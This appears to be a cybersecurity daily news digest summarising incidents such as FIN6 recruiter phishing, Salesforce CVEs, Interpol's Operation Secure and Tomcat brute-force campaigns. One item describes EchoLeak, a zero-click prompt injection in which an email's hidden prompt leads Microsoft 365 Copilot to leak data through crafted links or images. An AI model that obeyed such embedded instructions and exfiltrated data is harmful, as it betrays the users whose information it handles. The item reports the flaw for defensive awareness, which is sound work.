Daily Brief

FIN6, previously known for credit card theft and point-of-sale attacks, now engages in sophisticated phishing attacks targeting job recruiters via LinkedIn and Indeed. The cybercriminal group uses fake job-seeker profiles to lure recruiters to malicious websites hosted on AWS, disguised as personal portfolios. Recruiters are tricked into downloading a ZIP file containing the More_eggs malware, a JavaScript-based backdoor that facilitates remote command execution, credential theft, and further malware delivery. More_eggs operates primarily in memory, posing detection challenges due to its ability to evade standard security measures. The domains used for the fake portfolios are registered anonymously and leverage privacy features from GoDaddy, complicating efforts to track and shut down the malicious sites. Additional layers of deception include non-hyperlinked emails and CAPTCHA walls that screen out automated scanners, enhancing the success rate of the phishing campaign. DomainTools has identified and published indicators of compromise to aid in the detection and analysis of this campaign, highlighting the ongoing threat from FIN6 through less conventional vectors. Despite the article's humorous comment on recruiters, it underscores the serious nature of such targeted phishing scams and the vulnerabilities they exploit.

Salesforce has assigned five new CVEs related to the Flexcards and Data Mappers in their CRM system following a security evaluation. Over 20 configuration issues were reported, exposing risks such as unauthorized access and session hijacking; however, only five were considered for CVE labeling. Misconfigurations identified by AppOmni were not classified by Salesforce as CVEs, pushing the responsibility for security fixes onto the customers. These vulnerabilities mainly involve default settings and poor configuration choices by users, which can lead to severe security breaches involving sensitive data access. Salesforce advises customers to rigorously assess and secure their configurations to prevent potential exploitations by attackers. Aaron Costello from AppOmni highlighted the necessity for organizations using Salesforce's industry clouds to enforce field-level security and apply regular updates. The report by Costello also recommended increasing the component permission requirements and using private caching methods to enhance data protection.

A new zero-click AI vulnerability named 'EchoLeak' enables data exfiltration from Microsoft 365 Copilot without user interaction. The flaw, assigned CVE-2025-32711 and rated critical by Microsoft, was reported by Aim Labs researchers and has been addressed server-side. EchoLeak is categorized under a new class of vulnerabilities called 'LLM Scope Violation,' affecting large language models by leaking sensitive data involuntarily. The attack methodology involves a crafted email with a hidden prompt, which when processed by Copilot, inadvertently leaks data via crafted links or images. Microsoft has implemented fixes ensuring no customer impact and confirmed the absence of real-world exploitation of this vulnerability. The incident underscores the potential risks and the need for heightened security measures around AI-integrated systems within enterprise environments. Recommended actions include enhancing prompt injection filters, applying granular input scoping, and configuring RAG engines to block potentially malicious external communications.

Former associates of the Black Basta ransomware group have continued employing phishing and Python scripts in their attacks, adopting methods like Microsoft Teams phishing. ReliaQuest identified significant activity in Teams phishing between February and May 2025, with many attacks originating from compromised onmicrosoft[.]com domains. These threat actors are impersonating legitimate entities and tend to leverage existing remote desktop tools like Quick Assist and AnyDesk to gain deeper access, followed by deploying malicious Python scripts for command-and-control operations. After the Black Basta’s internal communications leak in February, the tactics have largely remained the same, although the original group identity has decreased in visibility. The attackers are speculated to have possibly transitioned to other Ransomware-as-a-Service (RaaS) groups like CACTUS or have integrated into the newly identified BlackLock group and DragonForce ransomware cartel. New Java-based Remote Access Trojans (RATs) are being deployed by these groups, now utilizing cloud file hosting services to disguise command and control traffic and enhance capabilities like file transfer and data theft. Rapidly evolving techniques suggest an increase in the complexity and stealth of future phishing campaigns, likely involving more sophisticated RATs and persistent access strategies.

An APT group, Stealth Falcon, exploited a zero-day RCE vulnerability in Windows WebDav to target Middle Eastern governments and defense entities. The CVE-2025-33053 vulnerability enables remote execution by misusing the directory handling of system executables to run malicious code from WebDAV servers. Microsoft patched the flaw in their latest update following its discovery and detailed analysis by Check Point Research. Attackers leveraged a .url file, disguised as a PDF in phishing emails, to manipulate the working directory of Windows tools and execute malware remotely. The malware installed includes 'Horus Loader' and 'Horus Agent,' sophisticated tools for espionage activities such as system fingerprinting and command execution. Check Point's investigation revealed the inclusion of additional post-exploitation tools like a credential dumper and a passive backdoor, enhancing the attackers' capabilities. Given the sophistication and stealth of the attacks, critical entities are urged to update their systems and monitor or block WebDAV traffic to prevent similar exploits.

Interpol, in collaboration with Asian countries, successfully conducted Operation Secure, arresting 32 individuals linked to infostealer malware. The operation led to the shutdown of 20,000 malicious domains and IP addresses, representing 79% of the targets identified. Authorities seized 41 servers and over 100 GB of data, disrupting numerous cybercrime operations. The multi-country effort involved contributions from 26 nations, focusing on tracking down servers, analyzing intelligence, and executing coordinated takedowns. In Vietnam, police apprehended a group leader, seizing cash, SIM cards, and documents indicating plans to sell corporate accounts. Additional raids in Sri Lanka and Nauru resulted in 14 arrests, with further investigations identifying 40 more victims of the malware. Hong Kong Police played a significant role, analyzing over 1,700 intelligence items and identifying 117 command-and-control servers. More than 216,000 individuals at risk from infostealer malware were notified and advised to take protective actions such as changing passwords and freezing accounts.

Prelude Security emphasizes the importance of quickly operationalizing threat intelligence to counteract ransomware and other cybersecurity threats effectively. Traditional methods of mapping threats to defensive measures are manual, slow, and can leave organizations vulnerable during critical periods. Effective use of threat intelligence requires rapid integration into security processes to preemptively address potential vulnerabilities and attack techniques. Many organizations fail to efficiently utilize high-quality intelligence due to lacking streamlined processes and tools for timely implementation. Mapping security configurations to frameworks like MITRE ATT&CK helps identify coverage gaps and optimize settings against known threats. Automation of threat mapping and security tool configuration can significantly reduce response times and enhance overall security efficacy. Prelude advocates for a proactive security posture, enabling continuous validation and optimization of defenses in real time to stay ahead of emerging threats. Joe Kaden at Prelude focuses on helping organizations streamline and operationalize their security practices to maximize the potential of their existing tools.

A recent cybersecurity alert detailed coordinated brute-force attacks on Apache Tomcat Manager interfaces, primarily used by large enterprises and SaaS providers. The attack utilized hundreds of unique IP addresses, many previously identified as malicious, to attempt unauthorized access by testing numerous credentials. GreyNoise cybersecurity analysts observed the malicious activity initiating from two separate campaigns starting June 5th, involving around 400 unique IPs focusing on Tomcat services. Most of these IP addresses originated from servers hosted by DigitalOcean, suggesting the misuse of legitimate cloud infrastructure for malicious purposes. Organizations with exposed Tomcat Manager interfaces are advised to strengthen authentication measures, monitor security logs, and block suspicious IPs to mitigate breach risks. While these attacks did not exploit specific vulnerabilities, Apache had previously patched several critical RCE vulnerabilities in Tomcat, highlighting ongoing security challenges. The attacks demonstrate a consistent interest from threat actors in exploiting web-based interfaces and underline the importance of robust cybersecurity defenses and prompt patch management.

International law enforcement action "Operation Secure" targeted global infostealer malware operations across 26 countries, resulting in 32 arrests. The action focused on dismantling criminal groups stealing financial and personal data, with significant data seizures and server takedowns. Vietnamese police arrested 18 individuals, including a leader of a cybercrime group involved in selling corporate accounts. Authorities identified 117 servers in Hong Kong used for phishing, online fraud, and social media scams. Private cybersecurity firms such as Kaspersky, Group-IB, and Trend Micro provided critical support and intelligence. Previous disruptions include a significant takedown involving the U.S. Department of Justice, the FBI, and Microsoft, which seized over 2,300 domains associated with Lumma Stealer. The same malware operations have been linked to major data breaches at companies like UnitedHealth, PowerSchool, and Snowflake.

GreyNoise reports a significant rise in brute-force attacks against Apache Tomcat Manager interfaces, identifying 295 malicious IPs involved. The attacks, observed on June 5, 2025, were predominantly from IPs based in the US, UK, Germany, the Netherlands, and Singapore, aiming to access exposed Tomcat services at scale. The trend reflects a coordinated attempt to exploit Tomcat Manager instances, with no specific vulnerability tied directly to these attempts, indicating a broader opportunistic threat. Alongside, Bitsight discovered over 40,000 security cameras publicly accessible via HTTP or RTSP, primarily in the telecom sector, showing a large-scale privacy breach risk. These wide-reaching security exposures suggest a need for increased cybersecurity vigilance, including strong authentication measures, access restrictions, and ongoing monitoring for suspicious activity. Both incidents highlight a persistent global challenge in securing both web interfaces and IoT devices against unauthorized access and exploitation.

INTERPOL’s Operation Secure dismantled over 20,000 malicious IP addresses tied to 69 malware variants between January and April 2025. Law enforcement from 26 countries collaborated to locate servers, map network infrastructures, and perform decisive takedowns. The coordinated international effort led to the successful takedown of 79% of targeted suspicious IPs and the seizure of 41 servers and over 100 GB of compromised data. Authorities arrested 32 suspects involved in diverse illegal cyber activities, including arrests in Vietnam, Sri Lanka, and Nauru. Hong Kong Police discovered 117 command-and-control servers used for initiating phishing scams, online fraud, and social media deception. Private sector collaboration, including from Group-IB, played a crucial role by providing essential intelligence on compromised user accounts and sensitive data. Compromised information typically facilitated secondary cybercrimes such as financial fraud, ransomware, and business email compromise (BEC) attacks. Operation Secure illustrates the increasing effectiveness of global cooperative efforts in combating sophisticated cybercrime networks.

DNS, foundational to internet functionality, translates domain names to IP addresses, facilitating user online interactions. Traditionally unsecured, DNS is susceptible to attacks, exposing users to service outages, data breaches, and redirections to malicious sites. Securing DNS isn't optional; it's a primary line of defense against various cyber threats, playing a role in early threat detection and response. ClouDNS enhances DNS security through DDoS protection, DNSSEC for authenticating DNS responses, and supports DNS over HTTPS/TLS to prevent interception. Implementing secure DNS practices such as DNS query encryption, and proper management of SPF, DKIM, and DMARC records are crucial for protecting data and maintaining domain reputation. DNS security offers a broad security perspective by acting as an early detection system, identifying potential intrusions and malicious activities at the initial stages. The article underscores the importance of DNS in digital infrastructure security, advocating for robust preventative measures to ensure operational continuity and data integrity.

Two key security vulnerabilities in SinoTrack GPS devices could lead to unauthorized tracking and control of vehicles. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory noting that attackers could exploit these flaws via a common web management interface. Attackers can access vehicle functions like location tracking and fuel pump disconnection by using default passwords. All versions of the SinoTrack IoT PC Platform are affected by these security vulnerabilities. Methods described for exploiting the vulnerabilities include using physically accessed or publicly posted device identifiers online. The security researcher, Raúl Ignacio Cruz Jiménez, emphasized the risks of remote execution and personal information theft due to the device’s inadequate security measures. No current fixes or patches are available for these vulnerabilities; SinoTrack has not yet responded to the issues. CISA advises changing the default passwords immediately and concealing device identifiers to mitigate risks until a fix is deployed.

Microsoft announced and then quickly modified a Patch Tuesday update for Windows 11 24H2 due to a compatibility issue affecting some devices. Affected devices were set to receive a revised update with the June 2025 security improvements shortly after the initial release. The incident raised concerns regarding the speed of addressing and acknowledging compatibility issues in major OS updates. The specific nature of the compatibility issue was not disclosed, but social media speculation suggested it might relate to CPU architecture differences. Although Microsoft intended the update to include critical security fixes, the flaw required a unique, expedited correction. Microsoft's rapid response to fix the issue was noted, though it brought up quality control questions about how such a significant error was missed. The company did not specify whether "by the end of the day" referred to Redmond local time or UTC.

River Island demonstrates effective security with a lean team of three, managing over 200 stores and an e-commerce platform without increasing headcount. Adopted Intruder’s exposure management platform to automate the visibility of their external attack surfaces, enhancing their security posture with continuous monitoring. Reduced tool redundancy by selecting integral and highly effective security tools, maximizing utility and minimizing operational inefficiency. Automated detection of emerging threats like Log4j, providing rapid responses and alleviating the need for manual scans, thus maintaining security with minimal resources. Enabled faster issue resolution by integrating their security systems with Jira, allowing direct task assignment to asset owners rather than centralizing through the security team. Implemented automated dashboards for cybersecurity reporting, reducing manual work and providing clear, real-time insights to leadership. The streamlined and automated systems not only saved time but also built trust with leadership, showing an effective balance between cybersecurity and resource management. Sunil Patel, River Island’s InfoSec Officer, illustrates that a small yet strategic security team can efficiently manage vast infrastructures and face modern cyber threats.